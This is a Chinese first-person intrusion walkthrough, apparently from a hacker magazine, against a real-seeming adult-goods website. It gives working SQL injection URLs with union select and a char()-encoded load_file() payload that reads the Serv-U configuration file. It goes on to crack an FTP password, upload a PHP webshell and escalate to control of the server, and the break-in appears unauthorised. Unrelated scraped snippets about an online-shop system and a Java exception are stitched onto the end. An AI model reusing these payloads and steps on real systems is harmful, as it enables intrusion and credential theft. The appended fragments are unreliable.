今天,滲透的是一家性用品**,**用的全是php程式,對於php構建的系統,一般後台資料庫都是mysql,就像asp對應著mssql和一樣,由於 php的特性(php預設將傳遞引數中的「『」等字元做了轉換,所以對於字元型別的變數預設情況下很難注入),一般情況下我們注入的只能是數字型別的變數,根據平時注入的知識,我們知道id=***的連線就有可能找到漏洞!
一、尋找注入點
首先,在主站上轉悠了一圈,主站中的數字型別變數不存在注入漏洞,提交http://www.***.com/view.php?id=1250 and 1=1和 1=2 ,在網頁裡把and 1=1和and 1=2都正常返回。
圖1 主站不存在注入點
顯然是做了過濾,因為**二級頁面也是php程式寫的,所以我就想先從二級頁面入手,進入了乙個二級頁面,好像是性圖書聯盟,這種東西害了多少青少年啊,今天就先拿你開刀,免得再腐蝕青少年的思想,隨便開啟了乙個數字型別變數的頁面
http://shu.***.com/book_view.php?id=339,提交
http://shu.***.com/book_view.php?id=339 and 1=1,返回正常頁面,提交
http://shu.***.com/book_view.php?id=339 and 1=2,沒有返回資料, 果然存在注入漏洞,手工來解決吧,手工注入更有助php注入的學習,提交http://shu.***.com/book_view.php?id=339 order by 20,頁面正常返回,提交
http://shu.***.com/book_view.php?id=339 order by 10,沒有返回資料, 說明欄位數在10和20之間,接著試提交http://shu.***.com/book_view.php?id=339 order by 15也是正常的,說明欄位數在15和20之間,當我提交到18時,頁面沒有資料返回,說明欄位數是17,18左右,接著提交http://shu.***.com/book_view.php?id=339 and 1=2 union select 1,2,4,5,6,7,8,9,10
,11,12,13,14,15,16,17/*,返回結果
圖2 性圖書聯盟的注入點
確定了字段數是17個。下面接著提交http://shu.***.com/book_view.php?id=339 and 1=2 union select 1,version(), database(),4,5,6,7,8,user(),10,11,12,13,14,15,16,17/*,返回結果
圖3 查詢資料庫的資訊
現在我們完成了對資料庫系統的探測。因為我們有可能不是root許可權,並且資料庫和web伺服器可能不在同一臺主機上,這樣我們就沒有讀取檔案的許可權了,測試下再說,先看下是用的什麼系統,如果是linux,可以提交etc/passwd,如果是windows,可以提交c://boot.ini,成功讀取出了c://boot.ini檔案內容,可以讀取檔案內容,主機用的是windows 系統,還是windows2003。
圖4 查詢伺服器的資訊
下面再來猜後台,先猜出後台再說,因為很多時候猜出了使用者名稱和密碼,最後卻找不到後台登入的地方。先試了幾個常見的,admin、manage、 admin、php、manage、php、login、admin_index.php,結果都沒找到。我想應該是管理員把後台改了,但是一般管理員不會改的很複雜,我就在一些常用的後台上加了些數字,例如:admin123、admin123456、admin88、admin888、 manage888,我就依次試了試,結果後台出來了,真是黃天不負有心天啊!http://shu.***.com/admin888/admin_login.php,
圖5 性圖書聯盟的後台登入位址
接下來,我們該猜解管理員表名,使用者名稱,密碼了,常見的都試了一遍,例如:user、admin、manage,password、pass、login,乙個都沒有,用工具也試了一遍,也沒找出來,入侵陷入困難,看看時間,也該睡了,養好精神明天再接著滲透。
二、利用serv-u使用者資訊配置檔案拿webshell
課一上完,我就回到寢室,馬上開啟電腦,先對**進行了一次掃瞄,伺服器開了只開了21、80埠,我用ftp shu.***.com,連上去看了下,果然用的是serv-u,而且是6.0版本的,那我先試試,看serv-u是不是在預設的安裝路徑
c://program files//serv-u//servudaemon.ini, 在位址列提交
http://shu.***.com/book_view.php?id=339 and 1=2 union select 1,2,3,4,5,6,7,8,load_file(char (67,58,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,115,101,114,118,45,117,92,92,83, 101,114,118, 85,68,97,101,109,111,110,46,105,110,105)),10,11,12,13,14,15,16,17/*,沒想到真是安裝在預設路徑,讀取出了serv-u的使用者資訊配置檔案內容,
圖6 伺服器serv-u的使用者資訊配置檔案
只有三個使用者,馬上把內容複製到本地,開啟serv-u純數字密碼破解器,立刻破解,沒想到只用了不到一分鐘,我就破解出了乙個使用者的密碼,是純數字的,密碼是321321,使用者的預設路徑是e:/shu_***_com,應該是存放**的路徑,馬上拿出flashxp連上去,果然是存放這個二級**的目錄
圖7,性圖書聯盟的ftp目錄
馬上上傳了乙個php一句話木馬,在瀏覽器中開啟php木馬,
圖8 成功拿到二級頁面性圖書聯盟的webshell
**的webshell拿到了,真是爽啊,今天運氣真的不錯,呵呵。
三、提公升許可權,攻下伺服器
拿到webshell了,再接再厲,繼續擴大戰果,看能不能攻下伺服器,因為剛開始我就結整個**掃瞄了下,主站是另外的伺服器,其它的二級**都是放在一台伺服器上,就在這個伺服器上,如果能攻下這台伺服器,那就能拿下所有的二級**了。首先看了下開的服務,第三方軟體有serv-u,mysql。提權的方法有幾種,我試了下,serv-u存在本地堤權,mysql資料庫用的root使用者連線的,可以讀取密碼,然後以系統許可權執行命令。這些方法網上講的很多了,我就不說詳細說了(不想浪費黑客手冊的版面),呵呵。拿到伺服器後我大致看了下,這台伺服器上放了這個**所有的二級頁面,有10個站點,關於**問題,我已經通知了管理員修補注入點了。
四、滲透總結
網上商城系統簡介
網上 系統簡介 添美網上 支援網上 的絕大部分功能,主要功能模組有 1.商品管理 2.商品管理 3.拍賣商品管理 4.明細記錄 5.送貨方式管理 6.快遞公司管理 7.訂單管理 8.購物車管理 9.管理員管理 10.角色管理 11.會員管理 12.諮訊頻道 13.系統設定 14.模板標籤 15.附件...
網上商城 登陸驗證
自定義異常 public class usernotfoundexception extends runtimeexception public static user check string username,string password throws usernotfoundexceptio...
搜尋展示 網上商城Web
網上 的搜尋展示 前端頁面 搜尋這塊做出form表單,可利用ajax訪問伺服器。下拉列表做出div,沒輸入時候就隱式狀態,輸入後從伺服器拿到資料,就把資料向div中展示 function overfn obj function outfn obj function clickfn obj funct...